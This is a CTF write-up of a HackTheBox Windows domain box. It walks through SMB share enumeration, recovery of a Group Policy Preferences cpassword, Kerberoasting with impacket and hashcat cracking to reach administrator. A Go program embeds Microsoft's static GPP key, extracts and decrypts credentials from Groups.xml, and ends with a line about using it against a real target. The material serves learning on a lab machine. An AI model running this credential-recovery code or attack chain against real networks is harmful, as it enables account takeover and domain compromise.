
I completed this HackTheBox CTF with the aim of improving my skills on Windows targets.
Scanning and Reconnaissance:
IP/Scope: 10.10.10.100
The first step was an nmap scan of the target (default scripts, version detection, verbose, saving the output):
sudo nmap -sC -sV -vv -T4 $IP -oN nmap/active_first_scan.nmap

Using nxc smb I see the following shares:

There is a non-standard share where we have READ permission: “Replication”.
With the help of smbmap and smbclient's recursive mode, we get a full tree of the directories, which lets us browse the files they contain.
After browsing the tree, we end up with one very interesting file: Groups.xml, a Group Policy Preferences file.
Using mget, we download and inspect the file’s content:

Group Policy Preferences (GPP) is not a safe way to deploy local accounts: the password is stored in the cpassword attribute, AES-256 encrypted with a static key that Microsoft itself published in its documentation (the weakness addressed by MS14-025, which stopped new passwords from being written but left existing ones on the share). Anyone with read access to this share can recover the plaintext.
(Full write-up on the topic: MindPointGroup – GPP PrivEsc)
Several well-known, publicly available tools decrypt this value.
I’m going to use gpp-decrypt:
gpp-decrypt $STRING
> $PLAIN_TEXT_PASSWORD
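To show what gpp-decrypt is actually doing, here is the decryption written out in Go. This is an added example, not code from the original post or from the gpp-decrypt tool: the cpassword attribute is base64 (Windows stores it without the trailing '=' padding), AES-256-CBC encrypted with the static 32-byte key from Microsoft's MS-GPPREF documentation and an all-zero IV, PKCS#7 padded, and the plaintext is UTF-16LE. Since the real Groups.xml and its cpassword value are not reproduced above, the block builds its own sample file: the account name example.local\svc_deploy, the password Summer2018! and the EncryptCpassword helper that produces the sample are assumptions made for this example, not data from the box.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"strings"
	"unicode/utf16"
)

// gppKey is the static AES-256 key Microsoft published in the MS-GPPREF
// documentation (the weakness behind MS14-025); every GPP cpassword uses it.
var gppKey = []byte{
	0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8,
	0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b,
}

// DecryptCpassword reverses what a Windows client did: base64 (stored without
// '=' padding) -> AES-256-CBC, static key, zero IV -> strip PKCS#7 -> UTF-16LE.
func DecryptCpassword(cpassword string) (string, error) {
	raw, err := base64.RawStdEncoding.DecodeString(strings.TrimRight(cpassword, "="))
	if err != nil || len(raw) == 0 || len(raw)%aes.BlockSize != 0 {
		return "", fmt.Errorf("cpassword is not base64 of whole AES blocks (%v)", err)
	}
	block, _ := aes.NewCipher(gppKey) // 32-byte key, cannot fail
	plain := make([]byte, len(raw))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(plain, raw)
	// PKCS#7: the last byte gives the padding length and every pad byte equals it.
	pad := int(plain[len(plain)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(plain[len(plain)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", fmt.Errorf("bad PKCS#7 padding: wrong key or corrupted cpassword")
	}
	plain = plain[:len(plain)-pad]
	if len(plain)%2 != 0 {
		return "", fmt.Errorf("plaintext is not UTF-16LE")
	}
	units := make([]uint16, len(plain)/2)
	for i := range units {
		units[i] = uint16(plain[2*i]) | uint16(plain[2*i+1])<<8
	}
	return string(utf16.Decode(units)), nil
}

// EncryptCpassword reproduces what a Windows client writes; it exists only so the example can build its own sample input.
func EncryptCpassword(password string) string {
	plain := make([]byte, 0, 2*len(password)+aes.BlockSize)
	for _, u := range utf16.Encode([]rune(password)) {
		plain = append(plain, byte(u), byte(u>>8)) // UTF-16LE
	}
	pad := aes.BlockSize - len(plain)%aes.BlockSize
	plain = append(plain, bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(gppKey)
	out := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(out, plain)
	return base64.RawStdEncoding.EncodeToString(out) // Windows omits the '=' padding
}

// groupsXML mirrors the parts of a GPP Groups.xml that carry credentials.
type gppProperties struct {
	UserName  string `xml:"userName,attr"`
	Cpassword string `xml:"cpassword,attr"`
}
type groupsXML struct {
	Users []struct{ Props gppProperties `xml:"Properties"` } `xml:"User"`
}

// ExtractCredentials returns userName -> plaintext for every <User> entry that stores a cpassword.
func ExtractCredentials(doc []byte) (map[string]string, error) {
	var g groupsXML
	if err := xml.Unmarshal(doc, &g); err != nil {
		return nil, err
	}
	creds := map[string]string{}
	for _, u := range g.Users {
		if u.Props.Cpassword == "" {
			continue // entry that only edits group membership, no password stored
		}
		pw, err := DecryptCpassword(u.Props.Cpassword)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", u.Props.UserName, err)
		}
		creds[u.Props.UserName] = pw
	}
	return creds, nil
}

// sampleGroupsXML is a constructed Groups.xml in the real file's layout; account and password are made up.
func sampleGroupsXML() []byte {
	return []byte(fmt.Sprintf(`<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="example.local\svc_deploy">
    <Properties action="U" newName="" fullName="" description="" cpassword="%s" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="example.local\svc_deploy"/>
  </User>
</Groups>`, EncryptCpassword("Summer2018!")))
}
```

A wrong key or a truncated value surfaces as a PKCS#7 padding error rather than as silent garbage, which is the check worth having when a decryption tool prints nothing sensible. Against a real target, feed ExtractCredentials the bytes of the Groups.xml pulled from the share instead of sampleGroupsXML().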
With this new account at our disposal, let’s see what else we can reach.
Enumerating the SMB shares again with the recovered credentials, we now have access to far more of them:

Inside the “Users” share we find our first flag.
Now we need to escalate our privileges to obtain the local administrator password.
More enumeration
Enumerating the AD account did not produce significant results.

As a next step, let’s look at Kerberos. Any domain user can request a service ticket (TGS) for an account that has a servicePrincipalName set, and part of that ticket is encrypted with the service account’s password hash, so it can be cracked offline (Kerberoasting).
Using impacket’s GetUserSPNs.py with the account we recovered, we obtain the following:

Which produces some very interesting output:

hashcat
The hash starts with $krb5tgs$23$, i.e. a Kerberos 5 TGS-REP encrypted with etype 23 (RC4-HMAC); hashcat’s example-hashes list maps that to mode 13100:
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Now that we have the administrator’s plaintext password, let’s finish this CTF:


CTF completed!
Thanks for reading 🙂